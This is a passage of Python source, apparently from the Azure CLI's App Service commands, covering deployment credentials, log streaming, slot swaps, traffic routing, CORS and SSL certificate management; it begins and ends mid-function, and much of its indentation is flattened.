raise ArgumentUsageError('usage error: --source-resource-group and '
'--source-name must both be specified if one is used')
# Overwrite app with its own snapshot
request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
if slot:
return client.web_apps.begin_restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.begin_restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(cmd, db_name, db_type, db_connection_string):
DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting')
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise ArgumentUsageError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(cmd, frequency):
FrequencyUnit = cmd.get_models('FrequencyUnit')
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise InvalidArgumentValueError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise InvalidArgumentValueError('Frequency must start with a number')
    if frequency_num <= 0:
        raise InvalidArgumentValueError('Frequency must be positive')
return frequency_num, frequency_unit
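# _parse_frequency examples (illustrative): '7d' -> (7, FrequencyUnit.day), '12h' -> (12, FrequencyUnit.hour).
# Any other unit suffix, or a non-numeric prefix, raises InvalidArgumentValueError.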
def _get_deleted_apps_locations(cli_ctx):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
web_provider = client.providers.get('Microsoft.Web')
del_sites_resource = next((x for x in web_provider.resource_types if x.resource_type == 'deletedSites'), None)
if del_sites_resource:
return del_sites_resource.locations
return []
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
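# The local git URL combines the publishing user with the SCM host from get_source_control, typically
# something like https://<publishing-user>@<app>.scm.azurewebsites.net/<app>.git (the
# .scm.azurewebsites.net host shown here is an assumption; the actual host comes from repo_url).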
def _get_scm_url(cmd, resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
for host in app.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ResourceNotFoundError('Failed to retrieve Scm Uri')
def get_publishing_user(cmd):
client = web_client_factory(cmd.cli_ctx)
return client.get_publishing_user()
def set_deployment_user(cmd, user_name, password=None):
'''
    Update deployment credentials. (Note: all webapps in your subscription will be impacted.)
'''
User = cmd.get_models('User')
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise ArgumentUsageError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'begin_list_publishing_credentials', slot)
return content.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None, xml=False):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot, {"format": "WebDeploy"})
full_xml = ''
for f in content:
full_xml += f.decode()
if not xml:
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
if not isinstance(profiles, list):
profiles = [profiles]
for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
cmd.cli_ctx.invocation.data['output'] = 'tsv'
return full_xml
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
if credentials:
cd_url = credentials.scm_uri + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
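# When DOCKER_ENABLE_CI is 'true', the CI/CD URL reported above is the Kudu SCM URI with '/docker/hook'
# appended; a container registry webhook pointed at that URL can presumably trigger a redeploy on push.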
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
SslState = cmd.get_models('SslState')
site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise ResourceNotFoundError("'{}' app doesn't exist".format(name))
    url = site.enabled_host_names[0]  # picks the custom domain URL in case a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob support
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
AzureBlobStorageApplicationLogsConfig, SiteLogsConfig,
HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise ResourceNotFoundError("'{}' app doesn't exist".format(name))
application_logs = None
if application_logging:
fs_log = None
blob_log = None
level = level if application_logging != 'off' else False
level = True if level is None else level
if application_logging in ['filesystem', 'off']:
fs_log = FileSystemApplicationLogsConfig(level=level)
if application_logging in ['azureblobstorage', 'off']:
blob_log = AzureBlobStorageApplicationLogsConfig(level=level, retention_in_days=3,
sas_url=None)
application_logs = ApplicationLogsConfig(file_system=fs_log,
azure_blob_storage=blob_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
        # TODO: Azure blob storage log config is currently not in use; it will be implemented later.
        # Tracked as issue #4764 on GitHub
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
            # 100 MB max log size, 3-day retention. Yes, we hard-code it; the portal does too
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def show_deployment_log(cmd, resource_group, name, slot=None, deployment_id=None):
import urllib3
import requests
scm_url = _get_scm_url(cmd, resource_group, name, slot)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
deployment_log_url = ''
if deployment_id:
deployment_log_url = '{}/api/deployments/{}/log'.format(scm_url, deployment_id)
else:
deployments_url = '{}/api/deployments/'.format(scm_url)
response = requests.get(deployments_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployments_url, response.status_code, response.reason))
sorted_logs = sorted(
response.json(),
key=lambda x: x['start_time'],
reverse=True
)
if sorted_logs and sorted_logs[0]:
deployment_log_url = sorted_logs[0].get('log_url', '')
if deployment_log_url:
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployment_log_url, response.status_code, response.reason))
return response.json()
return []
def list_deployment_logs(cmd, resource_group, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group, name, slot)
deployment_log_url = '{}/api/deployments/'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
import urllib3
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
import requests
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
scm_url, response.status_code, response.reason))
return response.json() or []
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp, 'update_configuration', slot, site_config)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, preserve_vnet=None, action='swap'):
client = web_client_factory(cmd.cli_ctx)
    # Default isPreserveVnet to 'true' if preserve_vnet is None
    isPreserveVnet = preserve_vnet if preserve_vnet is not None else 'true'
    # conversion from string to boolean
    isPreserveVnet = bool(isPreserveVnet == 'true')
CsmSlotEntity = cmd.get_models('CsmSlotEntity')
slot_swap_entity = CsmSlotEntity(target_slot=target_slot or 'production', preserve_vnet=isPreserveVnet)
if action == 'swap':
poller = client.web_apps.begin_swap_slot(resource_group_name, webapp, slot, slot_swap_entity)
return poller
if action == 'preview':
if slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name, webapp, slot_swap_entity)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp, slot, slot_swap_entity)
return result
    # 'reset': clear the applied slot configuration on the target slot (or production if no target is given)
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
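# swap_slot supports three modes: 'swap' starts the long-running swap, 'preview' applies the target
# slot's configuration to the source slot (or production) without swapping, and any other action
# (the CLI presumably passes 'reset') clears the previously applied configuration again.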
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
RampUpRule = cmd.get_models('RampUpRule')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise ResourceNotFoundError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_split = site.default_host_name.split('.', 1)
host_name_suffix = '.' + host_name_split[1]
host_name_val = host_name_split[0]
configs.experiments.ramp_up_rules = []
for r in distribution:
slot, percentage = r.split('=')
action_host_name_slot = host_name_val + "-" + slot
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=action_host_name_slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
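# Example distribution (illustrative): ['staging=25'] adds a ramp-up rule that reroutes 25% of traffic
# to the host '<app>-staging.<default host suffix>'; the remaining traffic stays on production.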
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
if provider:
streaming_url += ('/' + provider.lstrip('/'))
user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'begin_list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
def _get_log(url, user_name, password, log_file=None):
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = get_pool_manager(url)
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
                # Extra encode() and decode() for stdout encodings that do not support 'utf-8'
logger.warning(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace')
.rstrip('\n\r')) # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    with open(certificate_file, 'rb') as cert_file:
        cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
    ''' Loads the .pfx file and returns the certificate's SHA-1 thumbprint '''
    with open(certificate_file, 'rb') as f:
        p12 = OpenSSL.crypto.load_pkcs12(f.read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
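# The thumbprint computed above is the certificate's SHA-1 digest with the ':' separators removed,
# which matches the thumbprint format used elsewhere (e.g. by delete_ssl_cert) to identify certificates.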
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def show_ssl_cert(cmd, resource_group_name, certificate_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.get(resource_group_name, certificate_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise ResourceNotFoundError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise ResourceNotFoundError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
server_farm_id = webapp.server_farm_id
location = webapp.location
kv_id = None
if not is_valid_resource_id(key_vault):
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
key_vaults = kv_client.vaults.list_by_subscription()
for kv in key_vaults:
if key_vault == kv.name:
kv_id = kv.id
break
else:
kv_id = key_vault
if kv_id is None:
kv_msg = 'The Key Vault {0} was not found in the subscription in context. ' \
'If your Key Vault is in a different subscription, please specify the full Resource ID: ' \
'\naz .. ssl import -n {1} -g {2} --key-vault-certificate-name {3} ' \
'--key-vault /subscriptions/[sub id]/resourceGroups/[rg]/providers/Microsoft.KeyVault/' \
'vaults/{0}'.format(key_vault, name, resource_group_name, key_vault_certificate_name)
logger.warning(kv_msg)
return
kv_id_parts = parse_resource_id(kv_id)
kv_name = kv_id_parts['name']
kv_resource_group_name = kv_id_parts['resource_group']
kv_subscription = kv_id_parts['subscription']
    # If in the public cloud, check whether the certificate is an App Service Certificate,
    # in the same or a different subscription
kv_secret_name = None
cloud_type = cmd.cli_ctx.cloud.name
from azure.cli.core.commands.client_factory import get_subscription_id
subscription_id = get_subscription_id(cmd.cli_ctx)
if cloud_type.lower() == PUBLIC_CLOUD.lower():
if kv_subscription.lower() != subscription_id.lower():
diff_subscription_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_APPSERVICE,
subscription_id=kv_subscription)
ascs = diff_subscription_client.app_service_certificate_orders.list()
else:
ascs = client.app_service_certificate_orders.list()
for asc in ascs:
if asc.name == key_vault_certificate_name:
kv_secret_name = asc.certificates[key_vault_certificate_name].key_vault_secret_name
    # if kv_secret_name is not populated, this is not an App Service Certificate; fall back to a Key Vault certificate
if not kv_secret_name:
kv_secret_name = key_vault_certificate_name
cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
lnk_msg = 'Find more details here: {}'.format(lnk)
if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name, kv_subscription):
logger.warning('Unable to verify Key Vault permissions.')
logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
logger.warning(lnk_msg)
kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='',
key_vault_secret_name=kv_secret_name, server_farm_id=server_farm_id)
return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name,
certificate_envelope=kv_cert_def)
def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None):
Certificate = cmd.get_models('Certificate')
hostname = hostname.lower()
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
slot_text = "Deployment slot {} in ".format(slot) if slot else ''
raise ResourceNotFoundError("{0}app {1} doesn't exist in resource group {2}".format(slot_text,
name,
resource_group_name))
parsed_plan_id = parse_resource_id(webapp.server_farm_id)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
if plan_info.sku.tier.upper() == 'FREE' or plan_info.sku.tier.upper() == 'SHARED':
raise ValidationError('Managed Certificate is not supported on Free and Shared tier.')
if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot):
slot_text = " --slot {}".format(slot) if slot else ""
raise ValidationError("Hostname (custom domain) '{0}' is not registered with {1}. "
"Use 'az webapp config hostname add --resource-group {2} "
"--webapp-name {1}{3} --hostname {0}' "
"to register the hostname.".format(hostname, name, resource_group_name, slot_text))
server_farm_id = webapp.server_farm_id
location = webapp.location
easy_cert_def = Certificate(location=location, canonical_name=hostname,
server_farm_id=server_farm_id, password='')
# TODO: Update manual polling to use LongRunningOperation once backend API & new SDK supports polling
try:
return client.certificates.create_or_update(name=hostname, resource_group_name=resource_group_name,
certificate_envelope=easy_cert_def)
except Exception as ex:
poll_url = ex.response.headers['Location'] if 'Location' in ex.response.headers else None
if ex.response.status_code == 202 and poll_url:
r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
poll_timeout = time.time() + 60 * 2 # 2 minute timeout
while r.status_code != 200 and time.time() < poll_timeout:
time.sleep(5)
r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
if r.status_code == 200:
try:
return r.json()
except ValueError:
return r.text
logger.warning("Managed Certificate creation in progress. Please use the command "
"'az webapp config ssl show -g %s --certificate-name %s' "
" to view your certificate once it is created", resource_group_name, hostname)
return
raise CLIError(ex)
def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name, key_vault_subscription):
from azure.cli.command_modules.role._client_factory import _graph_client_factory
from azure.graphrbac.models import GraphErrorException
from azure.cli.core.commands.client_factory import get_subscription_id
subscription = get_subscription_id(cmd.cli_ctx)
# Cannot check if key vault is in another subscription
if subscription != key_vault_subscription:
return False
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
vault = kv_client.vaults.get(resource_group_name=resource_group_name, vault_name=key_vault_name)
# Check for Microsoft.Azure.WebSites app registration
AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd'
AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714'
graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
for policy in vault.properties.access_policies:
try:
sp = graph_sp_client.get(policy.object_id)
if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID:
for perm in policy.permissions.secrets:
if perm == "Get":
return True
except GraphErrorException:
pass # Lookup will fail for non service principals (users, groups, etc.)
return False
def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp,
host_name, ssl_state, thumbprint, slot=None):
Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState')
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=webapp.location, tags=webapp.tags)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'begin_create_or_update',
slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise ResourceNotFoundError("'{}' app doesn't exist".format(name))
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
found_cert = None
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
found_cert = webapp_cert
if not found_cert:
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
found_cert = webapp_cert
if found_cert:
if len(found_cert.host_names) == 1 and not found_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
found_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
query_result = list_hostnames(cmd, resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(found_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
h, ssl_type, certificate_thumbprint, slot)
return show_app(cmd, resource_group_name, name, slot)
raise ResourceNotFoundError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
    # the goal is to match '*.foo.com' with host names like 'admin.foo.com', 'logs.foo.com', etc.
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
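# Illustrative example (not executed): with hostnames_from_cert = ['*.contoso.com'] and
# hostnames_in_webapp = ['admin.contoso.com', 'www.fabrikam.com'], only 'admin.contoso.com'
# shares the '.contoso.com' suffix, so _match_host_names_from_cert returns {'admin.contoso.com'}.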
# helper class that handles runtime stacks in formats like 'node|6.1', 'php|5.5'
# pylint: disable=too-few-public-methods
class _AbstractStackRuntimeHelper:
def __init__(self, cmd, linux=False, windows=False):
self._cmd = cmd
self._client = web_client_factory(cmd.cli_ctx, api_version="2021-01-01")
self._linux = linux
self._windows = windows
self._stacks = []
@property
def stacks(self):
self._load_stacks()
return self._stacks
def _get_raw_stacks_from_api(self):
raise NotImplementedError
# updates self._stacks
def _parse_raw_stacks(self, stacks):
raise NotImplementedError
def _load_stacks(self):
if self._stacks:
return
stacks = self._get_raw_stacks_from_api()
self._parse_raw_stacks(stacks)
# WebApps stack class
class _StackRuntimeHelper(_AbstractStackRuntimeHelper):
# pylint: disable=too-few-public-methods
class Runtime:
def __init__(self, display_name=None, configs=None, github_actions_properties=None, linux=False):
self.display_name = display_name
self.configs = configs if configs is not None else dict()
self.github_actions_properties = github_actions_properties
self.linux = linux
def __init__(self, cmd, linux=False, windows=False):
# TODO try and get API support for this so it isn't hardcoded
self.windows_config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version',
'dotnet': 'net_framework_version',
'dotnetcore': None
}
self.default_delimeter = "|" # character that separates runtime name from version
self.allowed_delimeters = "|:" # delimiters allowed: '|', ':'
super().__init__(cmd, linux=linux, windows=windows)
def get_stack_names_only(self, delimiter=None):
windows_stacks = [s.display_name for s in self.stacks if not s.linux]
linux_stacks = [s.display_name for s in self.stacks if s.linux]
if delimiter is not None:
windows_stacks = [n.replace(self.default_delimeter, delimiter) for n in windows_stacks]
linux_stacks = [n.replace(self.default_delimeter, delimiter) for n in linux_stacks]
if self._linux and not self._windows:
return linux_stacks
if self._windows and not self._linux:
return windows_stacks
return {LINUX_OS_NAME: linux_stacks, WINDOWS_OS_NAME: windows_stacks}
def _get_raw_stacks_from_api(self):
return list(self._client.provider.get_web_app_stacks(stack_os_type=None))
def _parse_raw_stacks(self, stacks):
for lang in stacks:
if lang.display_text.lower() == "java":
continue # info on java stacks is taken from the "java containers" stacks
for major_version in lang.major_versions:
if self._linux:
self._parse_major_version_linux(major_version, self._stacks)
if self._windows:
self._parse_major_version_windows(major_version, self._stacks, self.windows_config_mappings)
def remove_delimiters(self, runtime):
import re
runtime = re.split("[{}]".format(self.allowed_delimeters), runtime)
return self.default_delimeter.join(filter(None, runtime))
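    # Illustrative example (not executed): remove_delimiters('node:14-lts') and
    # remove_delimiters('node|14-lts') both normalize to 'node|14-lts'.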
def resolve(self, display_name, linux=False):
display_name = display_name.lower()
stack = next((s for s in self.stacks if s.linux == linux and s.display_name.lower() == display_name), None)
if stack is None: # help convert previously acceptable stack names into correct ones if runtime not found
old_to_new_windows = {
"node|12-lts": "node|12lts",
"node|14-lts": "node|14lts",
"node|16-lts": "node|16lts",
"dotnet|5.0": "dotnet|5",
"dotnet|6.0": "dotnet|6",
}
old_to_new_linux = {
"dotnet|5.0": "dotnetcore|5.0",
"dotnet|6.0": "dotnetcore|6.0",
}
if linux:
display_name = old_to_new_linux.get(display_name)
else:
display_name = old_to_new_windows.get(display_name)
stack = next((s for s in self.stacks if s.linux == linux and s.display_name.lower() == display_name), None)
return stack
@classmethod
def get_site_config_setter(cls, runtime, linux=False):
if linux:
return cls.update_site_config
return cls.update_site_appsettings if 'node' in runtime.display_name.lower() else cls.update_site_config
# assumes non-java
def get_default_version(self, lang, linux=False, get_windows_config_version=False):
versions = self.get_version_list(lang, linux, get_windows_config_version)
versions.sort()
if not versions:
